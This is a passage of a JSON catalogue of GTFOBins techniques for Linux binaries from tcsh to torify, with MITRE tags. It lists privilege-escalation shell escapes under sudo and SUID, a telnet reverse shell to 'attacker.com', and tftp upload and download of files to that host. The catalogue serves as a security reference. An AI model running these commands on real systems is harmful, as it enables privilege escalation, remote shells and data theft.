context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcsh:file-write:0:unprivileged","toolId":"gtfo:tcsh","toolName":"tcsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"tcsh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tcsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcsh:shell:0:sudo","toolId":"gtfo:tcsh","toolName":"tcsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tcsh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tcsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcsh:shell:0:suid","toolId":"gtfo:tcsh","toolName":"tcsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tcsh -b","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tcsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcsh:shell:0:unprivileged","toolId":"gtfo:tcsh","toolName":"tcsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tcsh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tcsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tdbtool:shell:0:sudo","toolId":"gtfo:tdbtool","toolName":"tdbtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tdbtool\n! /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tdbtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tdbtool:shell:0:suid","toolId":"gtfo:tdbtool","toolName":"tdbtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tdbtool\n! /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tdbtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tdbtool:shell:0:unprivileged","toolId":"gtfo:tdbtool","toolName":"tdbtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tdbtool\n! /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tdbtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tee:file-write:0:sudo","toolId":"gtfo:tee","toolName":"tee","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | tee /path/to/output-file","description":"Use `-a` to append data to exising files.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tee/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tee:file-write:0:suid","toolId":"gtfo:tee","toolName":"tee","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | tee /path/to/output-file","description":"Use `-a` to append data to exising files.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tee/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tee:file-write:0:unprivileged","toolId":"gtfo:tee","toolName":"tee","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | tee /path/to/output-file","description":"Use `-a` to append data to exising files.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tee/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:telnet:reverse-shell:0:sudo","toolId":"gtfo:telnet","toolName":"telnet","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\ntelnet attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/telnet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:telnet:reverse-shell:0:suid","toolId":"gtfo:telnet","toolName":"telnet","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\ntelnet attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/telnet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:telnet:reverse-shell:0:unprivileged","toolId":"gtfo:telnet","toolName":"telnet","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\ntelnet attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/telnet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:telnet:shell:0:sudo","toolId":"gtfo:telnet","toolName":"telnet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"telnet\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/telnet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:telnet:shell:0:suid","toolId":"gtfo:telnet","toolName":"telnet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"telnet\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/telnet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:telnet:shell:0:unprivileged","toolId":"gtfo:telnet","toolName":"telnet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"telnet\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/telnet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:terraform:file-read:0:sudo","toolId":"gtfo:terraform","toolName":"terraform","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"terraform console\nfile(\"/path/to/input-file\")","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/terraform/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:terraform:file-read:0:suid","toolId":"gtfo:terraform","toolName":"terraform","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"terraform console\nfile(\"/path/to/input-file\")","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/terraform/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:terraform:file-read:0:unprivileged","toolId":"gtfo:terraform","toolName":"terraform","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"terraform console\nfile(\"/path/to/input-file\")","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/terraform/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tex:shell:0:sudo","toolId":"gtfo:tex","toolName":"tex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xetex"]},{"id":"gtfo:tex:shell:0:suid","toolId":"gtfo:tex","toolName":"tex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xetex"]},{"id":"gtfo:tex:shell:0:unprivileged","toolId":"gtfo:tex","toolName":"tex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xetex"]},{"id":"gtfo:tftp:download:0:sudo","toolId":"gtfo:tftp","toolName":"tftp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"tftp attacker.com\nget /path/to/input-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tftp:download:0:suid","toolId":"gtfo:tftp","toolName":"tftp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"tftp attacker.com\nget /path/to/input-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tftp:download:0:unprivileged","toolId":"gtfo:tftp","toolName":"tftp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"tftp attacker.com\nget /path/to/input-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tftp:upload:0:sudo","toolId":"gtfo:tftp","toolName":"tftp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"tftp attacker.com\nput /path/to/input-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tftp:upload:0:suid","toolId":"gtfo:tftp","toolName":"tftp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"tftp attacker.com\nput /path/to/input-file","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tftp:upload:0:unprivileged","toolId":"gtfo:tftp","toolName":"tftp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"tftp attacker.com\nput /path/to/input-file","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tic:file-read:0:sudo","toolId":"gtfo:tic","toolName":"tic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tic -C /path/to/input-file","description":"This translates a terminfo file from source format into compiled format. It will attempt to translate an arbitrary file and output the contents of the file on failure.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tic:file-read:0:suid","toolId":"gtfo:tic","toolName":"tic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tic -C /path/to/input-file","description":"This translates a terminfo file from source format into compiled format. It will attempt to translate an arbitrary file and output the contents of the file on failure.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tic:file-read:0:unprivileged","toolId":"gtfo:tic","toolName":"tic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tic -C /path/to/input-file","description":"This translates a terminfo file from source format into compiled format. It will attempt to translate an arbitrary file and output the contents of the file on failure.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:time:shell:0:sudo","toolId":"gtfo:time","toolName":"time","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"time /bin/sh","description":"Note that the shell might have its own builtin `time` implementation, which may behave differently than the binary, which is often located at `/usr/bin/time`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/time/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:time:shell:0:suid","toolId":"gtfo:time","toolName":"time","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"time /bin/sh -p","description":"Note that the shell might have its own builtin `time` implementation, which may behave differently than the binary, which is often located at `/usr/bin/time`.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/time/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:time:shell:0:unprivileged","toolId":"gtfo:time","toolName":"time","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"time /bin/sh","description":"Note that the shell might have its own builtin `time` implementation, which may behave differently than the binary, which is often located at `/usr/bin/time`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/time/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:timedatectl:inherit:0:sudo","toolId":"gtfo:timedatectl","toolName":"timedatectl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"timedatectl list-timezones","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/timedatectl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:timedatectl:inherit:0:unprivileged","toolId":"gtfo:timedatectl","toolName":"timedatectl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"timedatectl list-timezones","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/timedatectl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:timeout:shell:0:sudo","toolId":"gtfo:timeout","toolName":"timeout","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"timeout 0 /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/timeout/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:timeout:shell:0:suid","toolId":"gtfo:timeout","toolName":"timeout","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"timeout 0 /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/timeout/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:timeout:shell:0:unprivileged","toolId":"gtfo:timeout","toolName":"timeout","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"timeout 0 /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/timeout/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmate:shell:0:sudo","toolId":"gtfo:tmate","toolName":"tmate","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmate -c /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tmate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmate:shell:0:suid","toolId":"gtfo:tmate","toolName":"tmate","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmate -c /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tmate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmate:shell:0:unprivileged","toolId":"gtfo:tmate","toolName":"tmate","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tmate -c /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tmate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmux:file-read:0:sudo","toolId":"gtfo:tmux","toolName":"tmux","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tmux -f /path/to/input-file","description":"The file is read and parsed as a `tmux` configuration file, part of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tmux/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmux:file-read:0:suid","toolId":"gtfo:tmux","toolName":"tmux","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tmux -f /path/to/input-file","description":"The file is read and parsed as a `tmux` configuration file, part of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tmux/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmux:file-read:0:unprivileged","toolId":"gtfo:tmux","toolName":"tmux","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tmux -f /path/to/input-file","description":"The file is read and parsed as a `tmux` configuration file, part of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tmux/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmux:shell:0:sudo","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmux -c /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tmux/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmux:shell:0:suid","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmux -c /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tmux/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmux:shell:0:unprivileged","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tmux -c /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tmux/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmux:shell:1:sudo","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmux -S /path/to/socket","description":"Provided to have enough permissions to access the socket (e.g., `/tmp/tmux-xxx/default`).","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tmux/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmux:shell:1:suid","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmux -S /path/to/socket","description":"Provided to have enough permissions to access the socket (e.g., `/tmp/tmux-xxx/default`).","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tmux/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmux:shell:1:unprivileged","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tmux -S /path/to/socket","description":"Provided to have enough permissions to access the socket (e.g., `/tmp/tmux-xxx/default`).","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tmux/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:top:shell:0:sudo","toolId":"gtfo:top","toolName":"top","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e 'pipe\\tx\\texec /bin/sh 1>&0 2>&0' >>~/.config/procps/toprc\ntop\n# press return twice\nreset","description":"The config path might be different.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/top/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:top:shell:0:unprivileged","toolId":"gtfo:top","toolName":"top","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo -e 'pipe\\tx\\texec /bin/sh 1>&0 2>&0' >>~/.config/procps/toprc\ntop\n# press return twice\nreset","description":"The config path might be different.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/top/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:torify:shell:0:sudo","toolId":"gtfo:torify","toolName":"torify","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"torify /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/torify/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 